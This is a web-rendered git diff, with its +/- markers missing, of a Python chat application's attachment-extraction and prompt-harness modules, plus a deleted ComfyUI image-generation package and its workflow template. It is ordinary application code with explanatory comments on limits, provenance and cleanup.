payload = response.content[:MAX_PAGE_BYTES]
content_type = response.headers.get("content-type", "")
bare = content_type.split(";")[0].strip().lower()
if "html" in content_type or payload[:512].lstrip()[:1] == b"<":
title, text = html_to_text(payload.decode(response.encoding or "utf-8", "replace"))
elif (
content_type.startswith("text/")
or not content_type
or bare in _TEXTUAL
or bare.endswith(("+json", "+xml"))
):
elif content_type.startswith("text/") or not content_type:
title, text = "", payload.decode(response.encoding or "utf-8", "replace")
else:
raise FetchError(
+21 -290
View File
@@ -29,21 +29,11 @@ from sqlalchemy import select
from sqlalchemy.orm import Session as DBSession
from lembas.config import settings
from lembas.db.models import KIND_DOCUMENT, KIND_IMAGE, KIND_TEXT, Attachment, Message
from lembas.db.models import KIND_DOCUMENT, KIND_IMAGE, KIND_TEXT, Attachment
log = logging.getLogger(__name__)
# --- Limits ------------------------------------------------------------------
# These are the *defaults*, and an administrator can move every one of them on
# /admin/extraction. They stay here because a default belongs beside the code
# that depends on it, and because `prepare` is called from places with no
# database session at all.
#
# The values are read through `limits()`, a process-level snapshot with the same
# shape and the same reasoning as `services/branding.py`: one query per process,
# dropped when the page saves. Threading a session through `prepare`,
# `_process_image`, `_process_pdf` and `_process_text` would have meant six
# signatures changed to carry a number.
MAX_UPLOAD_BYTES = 20 * 1024 * 1024
# Longest edge after downscaling. Large enough for a model to read a screenshot
@@ -53,9 +43,6 @@ JPEG_QUALITY = 85
# Pillow's own guard against decompression bombs: a 60,000x60,000 PNG is a few
# KB on disk and hundreds of GB decoded.
#
# Deliberately NOT a setting. It is a guard, not a preference, and nothing good
# comes of being able to raise it from a form.
Image.MAX_IMAGE_PIXELS = 64_000_000
MAX_PDF_PAGES = 300
@@ -90,84 +77,6 @@ TEXT_EXTENSIONS = {
}
@dataclass(frozen=True)
class Limits:
"""What extraction is allowed to spend, for one process.
A snapshot rather than a lookup per call: `prepare` and everything under it
are called from routes, from tool runners and from the startup sweep, and
several of them have no session in hand. The pattern and the cost are the
same as `services/branding.py` -- one query per process, dropped when the
admin page saves, and stale across workers until each next reads.
"""
max_upload_bytes: int = MAX_UPLOAD_BYTES
max_image_edge: int = MAX_IMAGE_EDGE
jpeg_quality: int = JPEG_QUALITY
max_pdf_pages: int = MAX_PDF_PAGES
max_extracted_chars: int = MAX_EXTRACTED_CHARS
orphan_hours: int = 24
extra_text_extensions: tuple[str, ...] = ()
reject_unreadable_pdf: bool = False
def media_type_for(self, extension: str) -> str | None:
"""The media type for a text extension, or None if it is not one.
The built-in table first, then the administrator's additions as plain
text. Additions are extensions and not a mapping, because the mapping is
a thing somebody would have to get right twice and the media type of a
`.env` is `text/plain` whatever anybody types.
"""
if extension in TEXT_EXTENSIONS:
return TEXT_EXTENSIONS[extension]
return "text/plain" if extension in self.extra_text_extensions else None
_LIMITS: Limits | None = None
def limits() -> Limits:
"""The current extraction limits. Never raises -- see `branding.snapshot`."""
global _LIMITS
if _LIMITS is not None:
return _LIMITS
try:
from lembas.db.session import session_scope
from lembas.services import settings_store
with session_scope() as db:
values = settings_store.extraction(db)
_LIMITS = Limits(
max_upload_bytes=int(values["max_upload_mb"]) * 1024 * 1024,
max_image_edge=int(values["max_image_edge"]),
jpeg_quality=int(values["jpeg_quality"]),
max_pdf_pages=int(values["max_pdf_pages"]),
max_extracted_chars=int(values["max_extracted_chars"]),
orphan_hours=int(values["orphan_hours"]),
extra_text_extensions=tuple(
_clean_extension(item) for item in values["extra_text_extensions"]
),
reject_unreadable_pdf=bool(values.get("reject_unreadable_pdf")),
)
except Exception: # noqa: BLE001 - the shipped defaults are a usable answer
log.debug("could not read extraction settings; using defaults", exc_info=True)
return Limits()
return _LIMITS
def _clean_extension(raw: str) -> str:
value = str(raw or "").strip().lower()
if not value:
return ""
return value if value.startswith(".") else f".{value}"
def forget() -> None:
"""Drop the snapshot. Called by the admin page's save, and by tests."""
global _LIMITS
_LIMITS = None
class FileError(Exception):
"""A rejected upload, with a message fit to show the user."""
@@ -226,7 +135,6 @@ def _looks_like_pdf(payload: bytes) -> bool:
# --- Processing --------------------------------------------------------------
def _process_image(payload: bytes) -> Prepared:
bounds = limits()
try:
with Image.open(io.BytesIO(payload)) as image:
image.load()
@@ -237,8 +145,8 @@ def _process_image(payload: bytes) -> Prepared:
width, height = frame.size
longest = max(width, height)
if longest > bounds.max_image_edge:
scale = bounds.max_image_edge / longest
if longest > MAX_IMAGE_EDGE:
scale = MAX_IMAGE_EDGE / longest
frame = frame.resize(
(max(1, int(width * scale)), max(1, int(height * scale))),
Image.LANCZOS,
@@ -249,7 +157,7 @@ def _process_image(payload: bytes) -> Prepared:
frame.save(buffer, format="PNG", optimize=True)
media_type, extension = "image/png", ".png"
else:
frame.save(buffer, format="JPEG", quality=bounds.jpeg_quality, optimize=True)
frame.save(buffer, format="JPEG", quality=JPEG_QUALITY, optimize=True)
media_type, extension = "image/jpeg", ".jpg"
return Prepared(
@@ -267,7 +175,6 @@ def _process_image(payload: bytes) -> Prepared:
def _process_pdf(payload: bytes) -> Prepared:
bounds = limits()
from pypdf import PdfReader
from pypdf.errors import PdfReadError
@@ -291,7 +198,7 @@ def _process_pdf(payload: bytes) -> Prepared:
chunks: list[str] = []
total = 0
for index, page in enumerate(reader.pages[:bounds.max_pdf_pages]):
for index, page in enumerate(reader.pages[:MAX_PDF_PAGES]):
try:
text = page.extract_text() or ""
except Exception as exc: # noqa: BLE001 - one bad page is not fatal
@@ -301,14 +208,14 @@ def _process_pdf(payload: bytes) -> Prepared:
continue
chunks.append(f"[page {index + 1}]\n{text.strip()}")
total += len(text)
if total >= bounds.max_extracted_chars:
if total >= MAX_EXTRACTED_CHARS:
prepared.truncated = True
break
if prepared.pages > bounds.max_pdf_pages:
if prepared.pages > MAX_PDF_PAGES:
prepared.truncated = True
prepared.extracted_text = "\n\n".join(chunks)[:bounds.max_extracted_chars]
prepared.extracted_text = "\n\n".join(chunks)[:MAX_EXTRACTED_CHARS]
if not prepared.extracted_text.strip():
# Almost always a scan. Saying so beats the model silently ignoring
@@ -329,7 +236,6 @@ def _process_pdf(payload: bytes) -> Prepared:
def _process_text(payload: bytes, filename: str) -> Prepared:
bounds = limits()
for encoding in ("utf-8", "utf-16", "latin-1"):
try:
text = payload.decode(encoding)
@@ -344,73 +250,28 @@ def _process_text(payload: bytes, filename: str) -> Prepared:
if "\x00" in text[:4096]:
raise FileError("That file is not text, and is not a format LLeMbas can read.")
truncated = len(text) > bounds.max_extracted_chars
truncated = len(text) > MAX_EXTRACTED_CHARS
extension = Path(filename).suffix.lower()
return Prepared(
payload=payload,
kind=KIND_TEXT,
media_type=bounds.media_type_for(extension) or "text/plain",
extension=extension if bounds.media_type_for(extension) else ".txt",
extracted_text=text[:bounds.max_extracted_chars],
media_type=TEXT_EXTENSIONS.get(extension, "text/plain"),
extension=extension if extension in TEXT_EXTENSIONS else ".txt",
extracted_text=text[:MAX_EXTRACTED_CHARS],
truncated=truncated,
)
def _keep_image(payload: bytes) -> Prepared:
"""An image stored as it arrived, measured but not re-encoded.
`_process_image` exists to protect the window from a phone camera: eight
megapixels of JPEG become 1400px of JPEG at quality 85, and for something
somebody photographed that is all upside. For an image *this application
asked a diffusion model to make*, at a size somebody chose, it is a visible
loss on the one output the feature exists to produce -- soft detail and
ringing on exactly the fine texture the prompt was about.
Still opened by Pillow, so a malformed file is still refused and the
dimensions are still real rather than claimed; still bounded by
`MAX_UPLOAD_BYTES` in `prepare`. What is skipped is only the resize and the
transcode.
"""
detected = _detect_image(payload)
if detected is None:
raise FileError("That is not an image.")
media_type, extension = detected
try:
with Image.open(io.BytesIO(payload)) as image:
image.load()
width, height = image.size
except Image.DecompressionBombError as exc:
raise FileError("That image's dimensions are implausibly large.") from exc
except (UnidentifiedImageError, OSError, ValueError) as exc:
raise FileError("That image could not be read. Is it corrupt?") from exc
return Prepared(
payload=payload,
kind=KIND_IMAGE,
media_type=media_type,
extension=extension,
width=width,
height=height,
)
def prepare(payload: bytes, filename: str, *, keep_original: bool = False) -> Prepared:
"""Inspect an upload, decide what it is, and process it accordingly.
`keep_original` is for an image the application produced rather than one
somebody sent: see `_keep_image`. It applies to images only -- there is no
argument for keeping an unparsed PDF, and the text path stores its bytes
verbatim already.
"""
def prepare(payload: bytes, filename: str) -> Prepared:
"""Inspect an upload, decide what it is, and process it accordingly."""
if not payload:
raise FileError("That file is empty.")
ceiling = limits().max_upload_bytes
if len(payload) > ceiling:
raise FileError(f"Files must be under {ceiling // (1024 * 1024)} MB.")
if len(payload) > MAX_UPLOAD_BYTES:
raise FileError(f"Files must be under {MAX_UPLOAD_BYTES // (1024 * 1024)} MB.")
if _detect_image(payload) is not None:
return _keep_image(payload) if keep_original else _process_image(payload)
return _process_image(payload)
if _looks_like_pdf(payload):
return _process_pdf(payload)
return _process_text(payload, filename)
@@ -430,19 +291,9 @@ def store(
chat_id: str | None,
payload: bytes,
filename: str,
keep_original: bool = False,
source_path: str = "",
source_label: str = "",
message_id: str | None = None,
) -> Attachment:
"""Process and persist an upload. Raises FileError if it is unusable.
`message_id` is normally left null -- an upload is bound to a turn by
`claim()` when the message is sent. A generated image is the mirror image of
that: it exists *because* a reply is being written, so it says which turn it
belongs to at the moment it is made.
"""
prepared = prepare(payload, filename, keep_original=keep_original)
"""Process and persist an upload. Raises FileError if it is unusable."""
prepared = prepare(payload, filename)
stored_name = f"{secrets.token_hex(16)}{prepared.extension}"
(attachments_dir() / stored_name).write_bytes(prepared.payload)
@@ -450,7 +301,6 @@ def store(
attachment = Attachment(
user_id=user_id,
chat_id=chat_id,
message_id=message_id,
filename=safe_display_name(filename),
stored_name=stored_name,
media_type=prepared.media_type,
@@ -462,8 +312,6 @@ def store(
pages=prepared.pages,
truncated=prepared.truncated,
extraction_error=prepared.extraction_error,
source_path=source_path[:1000],
source_label=source_label[:200],
)
db.add(attachment)
db.commit()
@@ -486,22 +334,14 @@ def store_text(
text: str,
truncated: bool = False,
source_note: str = "",
source_path: str = "",
source_label: str = "",
) -> Attachment:
"""Attach text that did not arrive as a file -- a fetched web page.
Written to disk like any other attachment so it can be downloaded and so
there is one cleanup path, rather than a second kind of attachment that
exists only in the database.
`source_note` leads the *text*; `source_path` and `source_label` are
columns. The two are not the same thing and both are wanted: the note is
prose a model reads inside the document, and the columns become attributes
on the tag around it, which is what a reader sees on the chip and what
survives if the text is later truncated away from its own first line.
"""
body = text[:limits().max_extracted_chars]
body = text[:MAX_EXTRACTED_CHARS]
payload = body.encode("utf-8")
stored_name = f"{secrets.token_hex(16)}.txt"
@@ -519,51 +359,12 @@ def store_text(
# can see where an attachment called "Some Page.txt" came from.
extracted_text=f"Source: {source_note}\n\n{body}" if source_note else body,
truncated=truncated,
source_path=source_path[:1000],
source_label=source_label[:200],
)
db.add(attachment)
db.commit()
return attachment
def copy_attachment(
db: DBSession, *, user_id: str, chat_id: str | None, attachment: Attachment
) -> Attachment:
"""Duplicate something already sent, so it can ride along with a new message.
A copy and not a second reference to one row: an attachment belongs to the
message it was sent with, and sharing one between two would make deleting
either of them a question rather than an answer.
"""
stored_name = ""
source = attachments_dir() / attachment.stored_name if attachment.stored_name else None
if source is not None and source.exists():
stored_name = f"{secrets.token_hex(16)}{Path(source.name).suffix}"
(attachments_dir() / stored_name).write_bytes(source.read_bytes())
copy = Attachment(
user_id=user_id,
chat_id=chat_id,
filename=attachment.filename,
stored_name=stored_name,
media_type=attachment.media_type,
size_bytes=attachment.size_bytes,
kind=attachment.kind,
width=attachment.width,
height=attachment.height,
extracted_text=attachment.extracted_text,
pages=attachment.pages,
truncated=attachment.truncated,
extraction_error=attachment.extraction_error,
source_path=attachment.source_path,
source_label=attachment.source_label,
)
db.add(copy)
db.commit()
return copy
def copy_document(
db: DBSession, *, user_id: str, chat_id: str | None, document
) -> Attachment:
@@ -596,12 +397,6 @@ def copy_document(
pages=document.pages,
truncated=document.truncated,
extraction_error=document.extraction_error,
# Where it came from, for the same reason a project file carries it: a
# model handed four documents cannot tell which is which, and cannot
# name one back when asked to work on it. This was the one attach path
# that dropped provenance.
source_path=(document.title or "")[:1000],
source_label=(document.base.name if document.base else "Knowledge")[:200],
)
db.add(attachment)
db.commit()
@@ -621,19 +416,6 @@ def claim(db: DBSession, *, ids: list[str], user_id: str, message_id: str) -> li
Only unclaimed attachments belonging to this user are taken, so a stray or
forged id cannot pull someone else's file into a conversation.
**`chat_id` is set here, and it was not.** `POST /api/files` takes one, and
the composer sends it -- but only once a chat exists. A file picked on the
*new-chat* screen is stored before there is a chat to name, so its
`chat_id` stayed NULL for the rest of its life even after the message it
belongs to was sent. Six places filter on that column, and every one of them
was quietly wrong about those files: the harness did not name them among the
attached documents, the canvas refused to open them, and
`remove_files_for_chats` could not find them to delete -- so the temporary
sweep, the one caller it had, was removing nothing.
Read from the message rather than passed in, so no caller can bind an
attachment to one chat and a message in another.
"""
if not ids:
return []
@@ -647,11 +429,8 @@ def claim(db: DBSession, *, ids: list[str], user_id: str, message_id: str) -> li
)
)
)
message = db.get(Message, message_id)
for attachment in pending:
attachment.message_id = message_id
if message is not None:
attachment.chat_id = message.chat_id
db.commit()
return pending
@@ -676,19 +455,12 @@ def remove_files_for_chats(db: DBSession, chat_ids: list[str]) -> int:
return removed
def sweep_orphans(db: DBSession, older_than: timedelta | None = None) -> int:
def sweep_orphans(db: DBSession, older_than: timedelta = ORPHAN_AGE) -> int:
"""Delete uploads that were never attached to a message.
A file picked in the composer and then abandoned would otherwise sit on
disk forever.
`older_than` defaults to the configured age rather than to a constant, and
it is resolved *here* rather than in the signature: a default argument is
evaluated at import, so a module-level `ORPHAN_AGE` in the signature would
pin the shipped 24 hours whatever an administrator later set.
"""
if older_than is None:
older_than = timedelta(hours=limits().orphan_hours)
cutoff = datetime.now(UTC) - older_than
orphans = list(db.scalars(select(Attachment).where(Attachment.message_id.is_(None))))
@@ -724,44 +496,3 @@ def data_uri(attachment: Attachment) -> str | None:
return None
encoded = base64.b64encode(path.read_bytes()).decode("ascii")
return f"data:{attachment.media_type};base64,{encoded}"
def preview_data_uri(payload: bytes, *, max_edge: int = 0) -> str | None:
"""The same thing for bytes in hand, downscaled, for a model to look at.
Fidelity and weight are two different jobs. What is stored is what ComfyUI
produced, because that is the artefact somebody keeps; what is *shown to a
model to be judged* wants to be small, because a 400KB PNG is 550KB of
base64 in a request that exists only to answer one question.
Takes bytes rather than an Attachment: the reviewer looks at an image that
may be about to be thrown away, and writing a row for something rejected
seconds later is work with nothing to show for it.
`max_edge` of 0 means the configured one. Zero rather than None because the
caller that passes a number passes a number, and a sentinel that is also a
plausible value would be worse -- an edge of zero is not a picture.
"""
import base64
max_edge = max_edge or limits().max_image_edge
try:
with Image.open(io.BytesIO(payload)) as image:
image.load()
frame = image.convert("RGB")
longest = max(frame.size)
if longest > max_edge:
scale = max_edge / longest
frame = frame.resize(
(max(1, int(frame.width * scale)), max(1, int(frame.height * scale))),
Image.LANCZOS,
)
buffer = io.BytesIO()
frame.save(buffer, format="JPEG", quality=limits().jpeg_quality, optimize=True)
except (Image.DecompressionBombError, UnidentifiedImageError, OSError, ValueError):
log.warning("could not build a preview of a generated image", exc_info=True)
return None
encoded = base64.b64encode(buffer.getvalue()).decode("ascii")
return f"data:image/jpeg;base64,{encoded}"
File diff suppressed because it is too large Load Diff
+18 -301
View File
@@ -33,57 +33,23 @@ clearing those fragments in the admin page restores it exactly.
from __future__ import annotations
import logging
from datetime import datetime
from typing import Any
from sqlalchemy import select
from sqlalchemy.orm import Session as DBSession
from lembas.db.models import KIND_TASK, User
from lembas.services import branding, prompts, settings_store
from lembas.db.models import User
from lembas.services import prompts, settings_store
from lembas.services.library import memories as memories_service
from lembas.services.library import skills as skills_service
from lembas.services.schedule import clock
log = logging.getLogger(__name__)
# A ceiling on the whole block, so that a large library cannot quietly eat the
# context window. An administrator can lower it; `max_harness_chars` of 0 means
# "use this".
#
# It has to be larger than everything the shipped defaults are already allowed
# to put in, and at 8000 it was not. The fragments alone are about 7,900
# characters for an agent chat, and on top of that `index_chars` grants a 2,000
# character project listing and `instructions_chars` a 4,000 character
# AGENTS.md -- both defaults, both on by default. The block was therefore cut at
# 8,000 on an ordinary agent chat, and `prompts.assemble` cuts the *tail*, which
# by fragment order is exactly the context worth having: the listing was severed
# mid-tree and `context.agent_instructions` was dropped in its entirety. The one
# path by which a project's own instructions reach a model did not reach it.
#
# The two big blocks already carry their own budgets, applied before assembly,
# so they are bounded whatever this is. What this bounds is the *fragments*
# growing without anybody noticing -- so it is set above the sum of what those
# budgets grant, with room for the plan and the memories beside them.
#
# 20,000 rather than 16,000, which the shipped set had grown to within 1,300
# characters of. A ceiling this close to the content is one the next fragment
# crosses, and crossing it is silent: `assemble` cuts the tail, and the tail is
# the project's own AGENTS.md. `tests/test_harness.py` pins a margin now as well
# as a fit, so the room is a fact rather than a hope.
#
# 24,000 now, because that margin did its job: adding `core.commit` and
# `tool.agent_edits` took the headroom under 20% and the test said so rather
# than the AGENTS.md quietly losing its last paragraph on somebody's install.
# Raising the ceiling costs nothing by itself -- it is a limit, not a size, and
# the assembled block is the same length either way. What it buys is that the
# margin keeps meaning what it says.
MAX_HARNESS_CHARS = 24000
# How much of the ceiling the shipped fragments may occupy at full budget. The
# rest is headroom for an administrator's own wording, which is the thing this
# limit exists to leave room for -- an override is usually longer than the
# default it replaces, not shorter.
HARNESS_MARGIN = 0.2
# context window. Memory and skills have their own caps below this one. An
# administrator can lower it; `max_harness_chars` of 0 means "use this".
MAX_HARNESS_CHARS = 8000
# How many attached filenames to name in the prompt. Enough to show what the
# tags will look like, few enough that a chat with thirty files does not spend
@@ -91,22 +57,16 @@ HARNESS_MARGIN = 0.2
MAX_NAMED_DOCUMENTS = 5
def _families(db: DBSession, tools: list[dict[str, Any]]) -> list[str]:
"""Which families are represented in an offered tool list, in a fixed order.
def _families(tools: list[dict[str, Any]]) -> list[str]:
"""Which families are represented in an offered tool list, in a fixed order."""
from lembas.services.tools import FAMILIES, REGISTRY
Resolved against the database rather than the import-time registry, because
an administrator-defined tool is a row and would otherwise contribute no
family at all -- which is to say its guidance would never be admitted.
"""
from lembas.services import tools as tools_service
book = tools_service.registry(db)
offered = {
book[name].family
REGISTRY[name].family
for tool in tools
if (name := (tool.get("function") or {}).get("name")) in book
if (name := (tool.get("function") or {}).get("name")) in REGISTRY
}
return [family for family in tools_service.families(db) if family in offered]
return [family for family in FAMILIES if family in offered]
def _tool_names(tools: list[dict[str, Any]]) -> str:
@@ -115,32 +75,6 @@ def _tool_names(tools: list[dict[str, Any]]) -> str:
)
def _image_templates(db: DBSession) -> str:
"""One line per workflow, name and description.
The description is the load-bearing half, the same way it is for a skill:
it is the only thing the model has to choose with, and "workflow-2" is not
a choice. Capped, because a list of thirty costs the window on every
request forever.
"""
from lembas.db.models import ImageWorkflow
rows = list(
db.scalars(
select(ImageWorkflow)
.where(ImageWorkflow.enabled.is_(True))
.order_by(ImageWorkflow.position, ImageWorkflow.slug)
.limit(12)
)
)
return "\n".join(f"- {row.slug}: {row.description or row.name}" for row in rows)
def _image_models(db: DBSession) -> str:
"""The checkpoints an administrator has listed, comma separated."""
return ", ".join(settings_store.images(db).get("checkpoints") or [])
def _document_names(db: DBSession, chat) -> str:
"""The names of the non-image files attached anywhere in this chat."""
from lembas.db.models import Attachment
@@ -175,97 +109,22 @@ def context_variables(
from lembas.services import tools as tools_service
offered = tools or []
families = _families(db, offered)
# The reader's zone, not the server's. Telling somebody in another country
# that it is Tuesday when it is Wednesday where they are was survivable
# while the answer was only ever prose; it stops being survivable the moment
# they can say "every Monday at 3" and something has to work out when that
# is. `zone_for` falls back to the server's, so an instance where nobody has
# set one behaves exactly as it always did.
stamp = clock.now_for(user)
families = _families(offered)
stamp = datetime.now().astimezone()
values: dict[str, str] = {
"today": stamp.strftime("%A %-d %B %Y"),
"now": stamp.strftime("%A %-d %B %Y, %H:%M (UTC%z)"),
# Named so a model working out a schedule can say which zone it meant,
# and so `core.today` can carry it without a second fragment.
#
# The fallback is load-bearing and used to be absent. `name_for` returns
# "" for anybody who has never chosen a zone -- the default state of
# every account -- and the comment here claimed that dropped the line
# rather than announcing the server's zone as a decision. It did not:
# `substitute` drops a line only when it is *blank* after expansion, and
# this variable sits inside a sentence, so every such request shipped
# "- Times the person gives you are in unless they say otherwise."
#
# Naming the server's zone was never the thing being avoided anyway.
# `stamp` is `clock.now_for(user)`, which already falls back to it, so
# `{{today}}` and `{{now}}` are *already* in that zone and `{{now}}`
# already prints its offset. Withholding the label from a value the
# model has been given is not restraint, it is a hole. This is the
# fallback `schedule/compile.py` has always had, for the same reason.
"timezone": clock.name_for(user) or str(clock.server_zone()),
"instance_name": branding.for_db(db).name,
"instance_name": str(settings_store.get(db, "instance_name") or "LLeMbas"),
"user_name": (user.name or "") if user is not None else "",
"model_name": "",
# What this request will actually allow, so the model is not told a
# number that is not its own. `tools_service.MAX_ROUNDS` is only the
# fallback for callers with no session.
"max_rounds": str(settings_store.chat_rounds(db) or 0),
# Not rendered anywhere. It is the gate on `core.rounds`: an ordinary
# chat has a ceiling worth planning within, an agent chat is told to
# keep going instead, and those are different sentences rather than the
# same sentence with a different number in it. Blank when there is no
# ceiling at all, so the fragment vanishes rather than promising zero.
"round_budget": str(settings_store.chat_rounds(db) or ""),
# The complement, and the gate on `core.keep_working`. Exactly one of
# the two is ever set: a model told it has a budget rations it and stops
# early to report progress, and one told to keep going does the work.
# Not rendered anywhere either.
"unbounded": "" if settings_store.chat_rounds(db) else "yes",
"max_rounds": str(tools_service.MAX_ROUNDS),
"memory_limit": str(memories_service.MAX_MEMORY_CHARS),
"tool_names": _tool_names(offered),
"memories": memories_service.block(db, user) if "memory" in families else "",
"skills": (
skills_service.index_block(db, user, exclude=tools_service.scoped_skills_off(chat))
if "skills" in families
else ""
),
# What can be drawn, and with what. Guarded by family for the reason the
# memory block is: an instance with no ComfyUI must not pay a settings
# read and a table scan to tell a model about a tool it was not offered.
# Database reads only -- `context_variables` is synchronous and on the
# request path, so asking ComfyUI itself what it has would hold the
# request open while somebody's box thought about it. The admin page
# discovers; this reads what it stored.
"image_templates": _image_templates(db) if "image" in families else "",
"image_models": _image_models(db) if "image" in families else "",
"image_instructions": (
str(settings_store.images(db).get("instructions") or "") if "image" in families else ""
),
"skills": skills_service.index_block(db, user) if "skills" in families else "",
"knowledge_bases": "",
"document_names": "",
"agent_target": "",
"agent_dir": "",
"agent_mode": "",
"agent_rewound": "",
"background": "",
"project_files": "",
"agent_instructions": "",
"agent_instructions_file": "",
"plan": "",
"plan_editable": "",
# Empty everywhere but a scheduled task's own chat, which is what makes
# it the gate on `core.unattended` as well as the content of
# `context.schedule`. Two fragments, one variable, and no way for the
# warning to appear without the thing it warns about.
"schedule_instruction": "",
"schedule_summary": "",
# Set only in a helper's own chat, and the gate on `core.subagent`.
# Deliberately not the same variable as `schedule_instruction` even
# though both mean "nobody is reading": the two say different things to
# a model, and one fragment covering both would have to say neither.
"subagent": "",
}
if chat is not None:
@@ -280,151 +139,9 @@ def context_variables(
values["knowledge_bases"] = ", ".join(base.name for base in chat.knowledge_bases)
values["document_names"] = _document_names(db, chat)
# The one thing a tool description cannot carry, because a description
# is schema: which machine, which directory, and what this chat's mode
# currently permits. `max_rounds` is corrected here too, or an agent
# chat with forty rounds is told it has three.
if "agent" in families:
values.update(_agent_values(db, chat, user))
# Not gated on a family: a scheduled task has no tools of its own, and
# the thing that must reach the model is precisely that nobody is
# reading. One primary-key lookup, the same deal `plan` gets.
if chat.kind == KIND_TASK:
values.update(_schedule_values(db, chat, user))
# Not gated on a family either, and for the same reason: what has to
# reach a helper is that it is one. A column read, no query.
if chat.parent_chat_id:
values["subagent"] = "yes"
return values
def _schedule_values(db: DBSession, chat, user) -> dict[str, str]:
"""What a scheduled task's chat is for, and how often it comes round.
A task chat accumulates every run, so by the tenth the original instruction
is far out of sight up the transcript. Put back in front of the model each
turn rather than left to be inferred -- exactly what `Chat.plan_message_id`
exists to do for a plan.
"""
from lembas.services import schedules as schedules_service
schedule = schedules_service.for_chat(db, chat)
if schedule is None:
# The schedule was removed and its chat kept. There is nothing standing
# to say, so the fragments vanish rather than describing a timer that no
# longer exists.
return {}
return {
"schedule_instruction": schedule.instruction or schedule.request or "",
"schedule_summary": schedules_service.describe(schedule, owner=user),
}
def _agent_values(db: DBSession, chat, user) -> dict[str, str]:
"""What an agent chat's harness needs to say about where it is."""
from lembas.services import plans as plans_service
from lembas.services import settings_store
from lembas.services.agent import index as index_service
from lembas.services.agent import policy
from lembas.services.agent import session as agent_session
context = agent_session.resolve(db, chat, user)
if context is None:
return {}
rewound = ""
if getattr(chat, "rewound_at", None) is not None:
rewound = chat.rewound_at.strftime("on %-d %B at %H:%M")
return {
"agent_target": context.label,
"agent_dir": context.project_dir or "the login directory",
"agent_mode": policy.MODE_GUIDANCE.get(context.mode, ""),
"agent_rewound": rewound,
# Non-empty only when commands may run in the background, which is what
# gates the fragment telling the model so.
"background": "on" if context.background else "",
"max_rounds": str(context.limits.steps),
# Blanked, which is what makes `core.rounds` vanish here: `steps` is a
# runaway backstop and telling a model it has a budget of two hundred
# invites it to ration one. `unbounded` is its complement and is what
# `core.keep_working` is gated on, so an agent chat always gets the
# keep-going half whatever the instance setting says.
"round_budget": "",
"unbounded": "yes",
"project_files": _project_files(db, chat, context, settings_store, index_service),
# Already resolved on the context, from one primary-key lookup in
# `agent_session.resolve`. A plan the model cannot see is a plan it
# cannot keep current, which is the whole of why this is here.
"plan": plans_service.render_block(context.plan),
# Whether `plan_update` is actually in this request, which is not the
# same question as whether there is a plan. `agent/tools.py` drops it in
# Plan mode -- that mode ends with `plan_submit` instead -- so gating its
# guidance on `plan` alone told a model in Plan mode to "keep it current
# with plan_update as you go" about a tool that was not there, directly
# under `core.tool_list` saying anything unnamed does not exist. The
# fragment's own hint claimed the two coincided. They do not, and this
# is the variable that makes them.
"plan_editable": (
plans_service.render_block(context.plan) if context.mode != policy.MODE_PLAN else ""
),
**_project_instructions(db, chat, context, settings_store),
}
def _project_instructions(db: DBSession, chat, context, settings_store) -> dict[str, str]:
"""The project's own AGENTS.md, from cache and never fetched.
Written to mirror `_project_files` line for line, and under the same rule:
`cached()` only. `generation._warm_project` is what fills it.
"""
from lembas.services.agent import instructions as instructions_service
agents = settings_store.agents(db)
blank = {"agent_instructions": "", "agent_instructions_file": ""}
if not agents.get("instructions_enabled"):
return blank
budget = int(agents.get("instructions_chars") or 0)
if budget <= 0:
return blank
profile_id = getattr(chat, "ssh_profile_id", "") or ""
found = instructions_service.cached(profile_id, context.project_dir)
text = instructions_service.render(found, budget)
if not text:
return blank
return {"agent_instructions": text, "agent_instructions_file": found.filename}
def _project_files(db: DBSession, chat, context, settings_store, index_service) -> str:
"""The directory listing, *read from cache and never fetched*.
This whole module runs synchronously on the request path, so an SFTP round
trip here would hold a request open while somebody's box thought about it.
The build happens in the generation setup, which is async and already doing
network work; here we take whatever it left behind.
A chat whose very first reply outruns its first index simply has no listing
that turn -- the fragment's `requires` makes it vanish rather than appear as
an empty heading, and the next turn has it.
"""
agents = settings_store.agents(db)
if not agents.get("index_enabled"):
return ""
budget = int(agents.get("index_chars") or 0)
if budget <= 0:
return ""
profile_id = getattr(chat, "ssh_profile_id", "") or ""
found = index_service.cached(profile_id, context.project_dir)
if found is None:
return ""
return index_service.render(found, budget)
def limit_for(db: DBSession) -> int:
"""The ceiling on the assembled block."""
stored = settings_store.get(db, "max_harness_chars", key=settings_store.PROMPTS)
@@ -468,7 +185,7 @@ def compose(
return compose_from(
db,
variables=context_variables(db, user, offered, chat),
families=_families(db, offered),
families=_families(offered),
has_tools=bool(offered),
)
-13
View File
@@ -1,13 +0,0 @@
"""Making pictures, on a ComfyUI somebody else is running.
Three modules, split along the same seam the rest of the codebase uses:
`comfy.py` speaks HTTP and knows nothing about chats, `workflow.py` turns a
stored template plus a model's arguments into the document ComfyUI wants, and
`tool.py` is the `ToolDef` that ties them to a conversation.
Nothing here executes anything locally. That is the same rule agent chats
follow: the work happens on a service reached over HTTP, chosen and configured
by an administrator, and the security of it is the security of that service.
"""
from __future__ import annotations
@@ -1,52 +0,0 @@
{
"3": {
"inputs": {
"seed": "{{seed}}",
"steps": "{{steps}}",
"cfg": "{{cfg}}",
"sampler_name": "{{sampler}}",
"scheduler": "{{scheduler}}",
"denoise": "{{denoise}}",
"model": ["4", 0],
"positive": ["6", 0],
"negative": ["7", 0],
"latent_image": ["5", 0]
},
"class_type": "KSampler",
"_meta": { "title": "KSampler" }
},
"4": {
"inputs": { "ckpt_name": "{{model}}" },
"class_type": "CheckpointLoaderSimple",
"_meta": { "title": "Load Checkpoint" }
},
"5": {
"inputs": {
"width": "{{width}}",
"height": "{{height}}",
"batch_size": "{{batch}}"
},
"class_type": "EmptyLatentImage",
"_meta": { "title": "Empty Latent Image" }
},
"6": {
"inputs": { "text": "{{prompt}}", "clip": ["4", 1] },
"class_type": "CLIPTextEncode",
"_meta": { "title": "CLIP Text Encode (Prompt)" }
},
"7": {
"inputs": { "text": "{{negative}}", "clip": ["4", 1] },
"class_type": "CLIPTextEncode",
"_meta": { "title": "CLIP Text Encode (Negative)" }
},
"8": {
"inputs": { "samples": ["3", 0], "vae": ["4", 2] },
"class_type": "VAEDecode",
"_meta": { "title": "VAE Decode" }
},
"9": {
"inputs": { "filename_prefix": "LLeMbas", "images": ["8", 0] },
"class_type": "SaveImage",
"_meta": { "title": "Save Image" }
}
}
-374
View File
@@ -1,374 +0,0 @@
"""Talking to ComfyUI.
Four calls and a discovery one, all plain httpx. `fetch.fetch` cannot be reused
for the same reasons `custom_tools` gives -- it is GET-only, bodyless, and
refuses every content type that is not HTML or text, which is both the JSON here
